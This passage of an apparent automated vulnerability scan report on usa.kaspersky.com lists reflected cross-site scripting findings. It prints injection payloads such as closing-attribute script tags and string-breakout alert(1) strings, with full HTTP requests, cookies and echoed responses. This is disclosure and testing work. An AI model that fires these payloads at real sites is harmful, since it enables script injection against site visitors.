HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139040"
Content-Type: text/html; charset=utf-8
Content-Length: 35570
Date: Sun, 04 Sep 2011 12:24:07 GMT
X-Varnish: 1163052827
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf6a7f7"-alert(1)-"2f806a7d1f2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.221. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c50b"><script>alert(1)</script>3e346afd99a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf7c50b"><script>alert(1)</script>3e346afd99a HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139017"
Content-Type: text/html; charset=utf-8
Content-Length: 34827
Date: Sun, 04 Sep 2011 12:23:45 GMT
X-Varnish: 1163052091
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf7c50b"><script>alert(1)</script>3e346afd99a" />
...[SNIP]...

1.222. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1c44"-alert(1)-"37a9394198f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swfe1c44"-alert(1)-"37a9394198f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138969"
Content-Type: text/html; charset=utf-8
Content-Length: 33294
Date: Sun, 04 Sep 2011 12:22:52 GMT
X-Varnish: 1163050877
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swfe1c44"-alert(1)-"37a9394198f";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.223. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4525b"><script>alert(1)</script>9a663ec799f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf4525b"><script>alert(1)</script>9a663ec799f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138950"
Content-Type: text/html; charset=utf-8
Content-Length: 35966
Date: Sun, 04 Sep 2011 12:22:33 GMT
X-Varnish: 1163050341
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf4525b"><script>alert(1)</script>9a663ec799f" />
...[SNIP]...

1.224. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/PURE_summer_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/PURE_summer_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c23b"-alert(1)-"10b2e9cbe39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/PURE_summer_promo_frame.swf4c23b"-alert(1)-"10b2e9cbe39 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139071"
Content-Type: text/html; charset=utf-8
Content-Length: 33377
Date: Sun, 04 Sep 2011 12:24:38 GMT
X-Varnish: 1163053672
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/PURE_summer_promo_frame.swf4c23b"-alert(1)-"10b2e9cbe39";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.225. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc41"><script>alert(1)</script>e87ad2737ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf5fc41"><script>alert(1)</script>e87ad2737ca HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:25:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139110"
Content-Type: text/html; charset=utf-8
Content-Length: 35768
Date: Sun, 04 Sep 2011 12:25:23 GMT
X-Varnish: 1163054728
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf5fc41"><script>alert(1)</script>e87ad2737ca" />
...[SNIP]...

1.226. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86da1"-alert(1)-"46ad7e8ba57 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf86da1"-alert(1)-"46ad7e8ba57 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:25:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139143"
Content-Type: text/html; charset=utf-8
Content-Length: 40014
Date: Sun, 04 Sep 2011 12:25:58 GMT
X-Varnish: 1163055629
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf86da1"-alert(1)-"46ad7e8ba57";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.227. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef39"><script>alert(1)</script>823d4acb16c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf2ef39"><script>alert(1)</script>823d4acb16c HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:58 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138918"
Content-Type: text/html; charset=utf-8
Content-Length: 33432
Date: Sun, 04 Sep 2011 12:22:00 GMT
X-Varnish: 1163049311
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf2ef39"><script>alert(1)</script>823d4acb16c" />
...[SNIP]...

1.228. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a3de"-alert(1)-"0ee1a331aeb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf5a3de"-alert(1)-"0ee1a331aeb HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138926"
Content-Type: text/html; charset=utf-8
Content-Length: 30989
Date: Sun, 04 Sep 2011 12:22:09 GMT
X-Varnish: 1163049623
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
me;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf5a3de"-alert(1)-"0ee1a331aeb";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.229. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae0a"><script>alert(1)</script>bf723308b25 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/2ae0a"><script>alert(1)</script>bf723308b25 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138966"
Content-Type: text/html; charset=utf-8
Content-Length: 36457
Date: Sun, 04 Sep 2011 12:22:51 GMT
X-Varnish: 1163050813
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2ae0a"><script>alert(1)</script>bf723308b25" />
...[SNIP]...

1.230. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fd35"-alert(1)-"dcc2d772d0d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/7fd35"-alert(1)-"dcc2d772d0d HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138981"
Content-Type: text/html; charset=utf-8
Content-Length: 40042
Date: Sun, 04 Sep 2011 12:23:04 GMT
X-Varnish: 1163051210
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
me = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/7fd35"-alert(1)-"dcc2d772d0d";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.231. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93a5a"-alert(1)-"05956d8a4dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf93a5a"-alert(1)-"05956d8a4dd HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139058"
Content-Type: text/html; charset=utf-8
Content-Length: 32261
Date: Sun, 04 Sep 2011 12:24:22 GMT
X-Varnish: 1163053367
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
